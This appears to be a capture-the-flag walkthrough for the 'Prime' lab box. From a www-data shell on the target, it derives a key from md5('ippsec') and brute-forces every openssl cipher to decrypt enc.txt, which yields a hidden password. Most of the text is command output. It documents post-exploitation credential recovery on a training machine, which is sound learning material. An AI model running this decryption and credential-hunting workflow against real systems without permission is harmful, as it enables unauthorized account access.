aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq > CipherTypeRaws
gsub(/ /,"\n"): gsub is awk's global substitution function; it finds and replaces every match on the current line.
/ / is the pattern, a single space (the separator between entries), and "\n" is the replacement. Every space becomes a newline, so each space-separated entry ends up on its own line.
sort
Sorts the lines produced by awk. sort orders text lines; by default it sorts lexicographically.
uniq
Removes adjacent duplicate lines. uniq only collapses duplicates that are next to each other, which is why the input must be sorted first so that identical entries become adjacent.
There is also a text file, key.txt:
cat key.txt
I know you are a fan of ippsec.
So convert the string "ippsec" to an md5 hash and use it to get your own true form.
For that we need openssl enc --help:
└─# openssl enc --help
Usage: enc [options]
General options:
-help Display this summary
-list List ciphers
-ciphers Alias for -list
-e Encrypt
-d Decrypt
-p Print the iv/key
-P Print the iv/key and exit
-engine val Use engine, possibly a hardware device
Input options:
-in infile Input file
-k val Passphrase
-kfile infile Read passphrase from file
Output options:
-out outfile Output file
-pass val Passphrase source
-v Verbose output
-a Base64 encode/decode, depending on encryption flag
-base64 Same as option -a
-A Used with -[base64|a] to specify base64 buffer as a single line
Encryption options:
-nopad Disable standard block padding
-salt Use salt in the KDF (default)
-nosalt Do not use salt in the KDF
-debug Print debug info
-bufsize val Buffer size
-K val Raw key, in hex
-S val Salt, in hex
-iv val IV in hex
-md val Use specified digest to create a key from the passphrase
-iter +int Specify the iteration count and force the use of PBKDF2
Default: 10000
-pbkdf2 Use password-based key derivation function 2 (PBKDF2)
Use -iter to change the iteration count from 10000
-none Don't encrypt
-saltlen +int Specify the PBKDF2 salt length (in bytes)
Default: 16
-z Compress or decompress encrypted data using zlib
-* Any supported cipher
Random state options:
-rand val Load the given file(s) into the random number generator
-writerand outfile Write random data to the specified file
Provider options:
-provider-path val Provider load path (must be before 'provider' argument if required)
-provider val Provider to load (can be specified multiple times)
-propquery val Property query used when fetching algorithms
-K val Raw key, in hex
-K takes the raw key as a hex string, so the key has to be converted to hex first.
The Linux od command:
NAME
od - dump files in octal and other formats
It dumps bytes in octal by default, or in other formats such as hex.
octal means base 8.
└─# od --help
Usage: od [OPTION]... [FILE]...
  or:  od [-abcdfilosx]... [FILE] [[+]OFFSET[.][b]]
  or:  od --traditional [OPTION]... [FILE] [[+]OFFSET[.][b] [+][LABEL][.][b]]
Write an unambiguous representation, octal bytes by default, of FILE to standard output.
With more than one FILE argument, concatenate them in the listed order to form the input.
With no FILE, or when FILE is -, read standard input.
If first and second call formats both apply, the second format is assumed if the last operand
begins with + or (if there are 2 operands) a digit. An OFFSET operand means -j OFFSET.
LABEL is the pseudo-address at first byte printed, incremented when dump is progressing.
For OFFSET and LABEL, a 0x or 0X prefix indicates hexadecimal;
suffixes may be . for octal and b for multiply by 512.
Mandatory arguments to long options are mandatory for short options too.
-A, --address-radix=RADIX   output format for file offsets; RADIX is one
                              of [doxn], for Decimal, Octal, Hex or None
    --endian={big|little}   swap input bytes according to the specified order
-j, --skip-bytes=BYTES      skip BYTES input bytes first
-N, --read-bytes=BYTES      limit dump to BYTES input bytes
-S BYTES, --strings[=BYTES] show only NUL terminated strings
                              of at least BYTES (3) printable characters
-t, --format=TYPE           select output format or formats
-v, --output-duplicates     do not use * to mark line suppression
-w[BYTES], --width[=BYTES]  output BYTES bytes per output line;
                              32 is implied when BYTES is not specified
    --traditional           accept arguments in third form above
    --help                  display this help and exit
    --version               output version information and exit
Traditional format specifications may be intermixed; they accumulate:
-a   same as -t a,  select named characters, ignoring high-order bit
-b   same as -t o1, select octal bytes
-c   same as -t c,  select printable characters or backslash escapes
-d   same as -t u2, select unsigned decimal 2-byte units
-f   same as -t fF, select floats
-i   same as -t dI, select decimal ints
-l   same as -t dL, select decimal longs
-o   same as -t o2, select octal 2-byte units
-s   same as -t d2, select decimal 2-byte units
-x   same as -t x2, select hexadecimal 2-byte units
TYPE is made up of one or more of these specifications:
a          named character, ignoring high-order bit
c          printable character or backslash escape
d[SIZE]    signed decimal, SIZE bytes per integer
f[SIZE]    floating point, SIZE bytes per float
o[SIZE]    octal, SIZE bytes per integer
u[SIZE]    unsigned decimal, SIZE bytes per integer
x[SIZE]    hexadecimal, SIZE bytes per integer
SIZE is a number. For TYPE in [doux], SIZE may also be C for sizeof(char),
S for sizeof(short), I for sizeof(int) or L for sizeof(long). If TYPE is f,
SIZE may also be F for sizeof(float), D for sizeof(double) or L for sizeof(long double).
Adding a z suffix to any type displays printable characters at the end of each output line.
BYTES is hex with 0x or 0X prefix, and may have a multiplier suffix:
b    512
KB   1000
K    1024
MB   1000*1000
M    1024*1024
and so on for G, T, P, E, Z, Y, R, Q.
Binary prefixes can be used, too: KiB=K, MiB=M, and so on.
GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation <https://www.gnu.org/software/coreutils/od>
or available locally via: info '(coreutils) od invocation'


┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | od -A n -t x1
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
0a
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n'
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31 37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431
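The pipeline above, together with the echo -n point made earlier, boils down to one reusable function. The script below is an added example, not from the original post: md5_both makes the newline problem visible, and ascii_key_hex produces the -K value. The assumption it encodes is the one the box relies on, that the 32 hex characters of the digest were used as a 32-byte (256-bit) key, so -K needs the hex of those characters, not the digest itself.

```shell
#!/bin/sh
# Added example: derive the raw key for `openssl enc -K` from md5("ippsec")
# the way key.txt asks, and show why a bare `echo` gives the wrong hash.

# md5_both STRING: digest of STRING without and with a trailing newline.
# A bare `echo ippsec` hashes "ippsec\n", so the second line differs.
md5_both() {
    printf 'no newline  : %s\n' "$(printf '%s' "$1" | md5sum | cut -d' ' -f1)"
    printf 'with newline: %s\n' "$(printf '%s\n' "$1" | md5sum | cut -d' ' -f1)"
}

# ascii_key_hex STRING: hex encoding of the 32 ASCII characters of
# md5(STRING). Read as hex, the digest is only 16 bytes (a 128-bit key);
# used as a *string* it is 32 bytes, i.e. a 256-bit key, and that string is
# what -K must receive, encoded as 64 hex digits.
ascii_key_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1 | tr -d '\n' \
        | od -A n -t x1 | tr -d ' \n'
}

# Usage: sh keyhex.sh ippsec
if [ -n "${1:-}" ]; then
    md5_both "$1"
    printf 'openssl -K value: %s\n' "$(ascii_key_hex "$1")"
fi
```

printf '%s' is used instead of echo -n because echo -n is not portable across shells, whereas printf never appends a newline unless told to.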
Why look at openssl enc at all? Because in /home/saket we saw the enc binary, and

the string in enc.txt is base64 encoded, so it has to be base64-decoded first and then decrypted.
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$
-d Decrypt
-a Base64 encode/decode, depending on encryption flag
-A Used with -[base64|a] to specify base64 buffer as a single line
┌──(root㉿kali)-[~/Desktop/Prime]
└─# for Cipher in $(cat CipherTypeRaws);do echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E617BB6C7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
802683E0667F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
800666C5AD7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80C69DCE5C7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80765A1DF97F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
bad decrypt
80C6A5831E7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80A618B2777F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: blake2b512
enc: Use -help for summary.
80B6C13A8E7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2b512 : 101), Properties (<null>)
enc: Unknown option or cipher: blake2s256
enc: Use -help for summary.
80862598BD7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2s256 : 99), Properties (<null>)
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E624AB2B7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
800638B35C7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
80B6FEC81D7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8096F8558D7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80065927AC7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
80764275907F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
8076F7C62E7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
enc: Unknown option or cipher: md4
enc: Use -help for summary.
80E640F7987F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md4 : 97), Properties (<null>)
enc: Unknown option or cipher: md5
enc: Use -help for summary.
8026E6D1B47F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md5 : 98), Properties (<null>)
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8016788E007F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
hex string is too long, ignoring excess
enc: Unknown option or cipher: rmd160
enc: Use -help for summary.
8026E546657F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (rmd160 : 0), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8016FA84C67F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: sha1
enc: Use -help for summary.
809659148C7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha1 : 87), Properties (<null>)
enc: Unknown option or cipher: sha224
enc: Use -help for summary.
80463B5F687F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha224 : 85), Properties (<null>)
enc: Unknown option or cipher: sha256
enc: Use -help for summary.
80968340C77F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha256 : 100), Properties (<null>)
enc: Unknown option or cipher: sha3-224
enc: Use -help for summary.
80761F73F47F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-224 : 86), Properties (<null>)
enc: Unknown option or cipher: sha3-256
enc: Use -help for summary.
80C69E17C57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-256 : 95), Properties (<null>)
enc: Unknown option or cipher: sha3-384
enc: Use -help for summary.
80C661AF047F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-384 : 88), Properties (<null>)
enc: Unknown option or cipher: sha3-512
enc: Use -help for summary.
8056A70B197F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-512 : 83), Properties (<null>)
enc: Unknown option or cipher: sha384
enc: Use -help for summary.
80267A1E897F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha384 : 93), Properties (<null>)
enc: Unknown option or cipher: sha512
enc: Use -help for summary.
8046BD07937F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512 : 90), Properties (<null>)
enc: Unknown option or cipher: sha512-224
enc: Use -help for summary.
80B6C126207F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-224 : 91), Properties (<null>)
enc: Unknown option or cipher: sha512-256
enc: Use -help for summary.
805679F1CE7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-256 : 84), Properties (<null>)
enc: Unknown option or cipher: shake128
enc: Use -help for summary.
80A60163A97F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake128 : 103), Properties (<null>)
enc: Unknown option or cipher: shake256
enc: Use -help for summary.
8076F9804C7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake256 : 92), Properties (<null>)
enc: Unknown option or cipher: sm3
enc: Use -help for summary.
8076FA26EB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sm3 : 94), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80D6E1A7117F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: zlib
enc: Use -help for summary.
80B6B7F5ED7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zlib : 0), Properties (<null>)
enc: Unknown option or cipher: zstd
enc: Use -help for summary.
80B698C8CE7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zstd : 0), Properties (<null>)
There are lots of errors in the results; that is normal, but there is also an openssl bug hiding in here.
Sometimes this step needs the \n, that is, stripping the newline, and sometimes it does not.
When is it not needed? That depends on whether the data really contains a newline.
If it really does contain a newline, then after the conversion, once the decryption finishes, the output should end with a newline.
If it has one and I have also stripped the \n, then obviously it will not decrypt.
In that case there is nothing for it but to try both ways.
This is generally considered an openssl bug.
┌──(root㉿kali)-[~/Desktop/Prime]
└─# for Cipher in $(cat CipherTypeRaws);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
iv undefined
hex string is too long, ignoring excess
bad decrypt
80B6DCFD587F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
l{���[��7�ƏmfE��K����;0�`Z▒�� :�y��N�.�Fj�|z�x�G���rd��/��
�:�Z91�yMV���@��S▒u����_j,����^+�FAC��ﴌ6���-��~��I�_���%���C���Դ��:��}T�q�4�同��#��ʛiv undefined
hex string is too long, ignoring excess
bad decrypt
80F61910797F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
~I�l2UFײ:H3V�>Z����§��N[sgħ��:��-]�����v;ń#�M��|g��
�|&�As
�� �B0��mĖ�*�0r������{Hw� Ƕ�~�g�X�2▒�'+��+�����[D���5��d����!%o {iv undefined
!!!!
look here
!!!!
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,iv undefined
!!!!
look here
!!!!
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8056B856477F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
t[�����/<T5u���L?c���4��G�▒�ki*�U�f��E0��o��qp���õ/▒���@�wh��G�
ec�r�������]1��9ґp�IDW�p�wj��%�f�~2�LD▒�iv undefined �?g�
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
<�▒�bØ�H�� TG
\�|��$�4���E����F���lS9��s��5��IV:W�[ijn1��E����=��YShL�����Tsq�"���{L�,"
�q�7w1|����s�;�d���/�S��▒7���%h��7�(
bad decrypt
805601DA5A7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
"yR����v�2�iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
bad decrypt
8076DB188A7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
,_���U(t��^>�3cm��=��~�V�ĩx&q�k����!�Z)�ͻ�x�I�䞝JW��▒���a�P����U����N5���Q�c�^Ƕ�> �W*��W����)~Rc#�c`ҋ���u�IPV����yX����]Oan�+�vJ▒1��iv undefined
?L.�ocX(���K��r�t�=���B�w�w����8*_���E#�������m8Bz\�7p��Jv��v�,6ב��;X�G'+��P���X�;j;f���YS1
�
��Ֆt7iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
1�a��4�#�yQ.��H���
��8iN�HAn*�RXz{�GS��u�.��ߩ�Y���(�$Ҙ��z�gwF
1�EixN4��Rs�8�e�∌K �B�6M�ە�^vay��IQg
bad decrypt
80661AF0FD7E0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
b����)-�wK8Qwx���ϥ��n�U"��1a|$t���HLF�σiv undefined
enc: Unknown option or cipher: blake2b512
enc: Use -help for summary.
80469CB9D57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2b512 : 101), Properties (<null>)
enc: Unknown option or cipher: blake2s256
enc: Use -help for summary.
8066C069117F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2s256 : 99), Properties (<null>)
iv undefined
hex string is too long, ignoring excess
�!�#bW'ˀ�KE;!�"��{cyF
���7^��4�^�▒�9v��N�Ŧ+2f
���{��u\Z�|�2 �0�'Z�j�wUpRd��ew�:�˪\� �M�TkG%�Nƃ�g�S����Ր��O�{�osV�%�؆��c����0�a�YDD0d�Y�
bad decrypt
8036B8337F7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
C&iv undefined
hex string is too long, ignoring excess
bad decrypt
80E6DAADD27F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
�����?�E��wUaf�,T�]6�o�*��h}������J���7c�ю��@�J7��
��L�������~�2C�L34�4ĺ�s��I�$>���7��f����O
�+�{liSLʉ���,��E�U WǜS`Gsj����6�/��t~iv undefined
ހ��Ӑ��<�%wLC�~u����pgu�F��:XM��Jc�|����Ř▒��6"�����]7����#����Oܛ�=�
���K��F$��L����IF��u4�fE+.�-W����2
bad decrypt
8046E1C24D7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
%�(�xC�E����s:�j��7��d�ئ!jc���S��2ʤiv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E6C27F7D7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
F�?�<>�~�(�E}�5��\��▒S��4NZ硶Kt��A�fT���C�����R6�������7������-A|��5���Ƞ�`;R��c&m#m�T<x�cq=�oh�▒�0Wb�l��aB�aZ�z"��fTːq_ԙS���&Y�7�^;��]�9�t s�iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80165DD57F7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
�Ղ�$�%�.�%��r�A�z��9�_�����;�E��f�|F:{��mfq2�j� >�<����0����Ӓ�������2�&?r�'��:k(#j�0N!���xU0��쯾6b�>���o)������hex string is too long, ignoring excess
+�D��L�Ҁ�7(��[x��%����E=�<>d&�N�\�D���
bad decrypt
80665F06AA7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
��c�*� �`���OjJ-�X�{�'��V�X{g��C▒J,�E
�7�W3η���T��^T��DK=���w�j��&��J?����h(Վ�dId�
6�z��i���FYDN
Q��ghex string is too long, ignoring excess
bad decrypt
80967545767F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
6^{�h�R�J-'�yAv/>c�GHA�זϞ�V����$�㢡U�oX�+(���{X���)#KB��g,�5��▒�]��r恘`�����e�9���H▒�k��n�D�i|a��<�\��Kc▒&9S�O��τjg�)�V��-�[7�=��ݹgT��Thiv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
enc: Unknown option or cipher: md4
enc: Use -help for summary.
8086E19EBB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md4 : 97), Properties (<null>)
enc: Unknown option or cipher: md5
enc: Use -help for summary.
8056D852157F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md5 : 98), Properties (<null>)
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
�>�kO;}r�HLp
bad decrypt
80D697C6157F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
��0�+y@�m�^������'���L9*�X�A9{G�+��"��@w���8��wģ�"�TE�����uq(f�iv undefined
hex string is too long, ignoring excess
����3�'�/?�PR�| {���B�t�r_���?3�&
����I�9/`�v�����vz~z�(���5��k��iG�[�<gG�▒���j`*/�f�2�
�VX�I.p�Y2DY4��=C��*���Rl!F��▒�t�fyE�<i��y!��MK�N� =�<hex string is too long, ignoring excess
����NEI�g�▒�?�L��7�Aˍ�ZV.D*��d���Ʀ�2�J���fԦW �<���,3���W��rIJ�q"��n���#雥��q����'��N6�(
A5-j��y]G!a��O��� z�[,?�T�r;enc: Unknown option or cipher: rmd160
enc: Use -help for summary.
80861B00237F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (rmd160 : 0), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
+�� ��A��!�]v6
bad decrypt
8056197AAF7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
�q�▒{T�:�$���� �Qr������4Tԥ�OY�▒�MU�*��{H�$�%�6X��Vc�F�W,���&<�1�GE2��{����4��Q0�{^;!J*��טŮ��PdDXH��Ɍ �#�炅;�<DD��f�
tiv undefined
enc: Unknown option or cipher: sha1
enc: Use -help for summary.
808624580D7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha1 : 87), Properties (<null>)
enc: Unknown option or cipher: sha224
enc: Use -help for summary.
80069C857D7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha224 : 85), Properties (<null>)
enc: Unknown option or cipher: sha256
enc: Use -help for summary.
80763FBA477F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha256 : 100), Properties (<null>)
enc: Unknown option or cipher: sha3-224
enc: Use -help for summary.
80A60108E77F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-224 : 86), Properties (<null>)
enc: Unknown option or cipher: sha3-256
enc: Use -help for summary.
804662B98B7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-256 : 95), Properties (<null>)
enc: Unknown option or cipher: sha3-384
enc: Use -help for summary.
80C601CC587F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-384 : 88), Properties (<null>)
enc: Unknown option or cipher: sha3-512
enc: Use -help for summary.
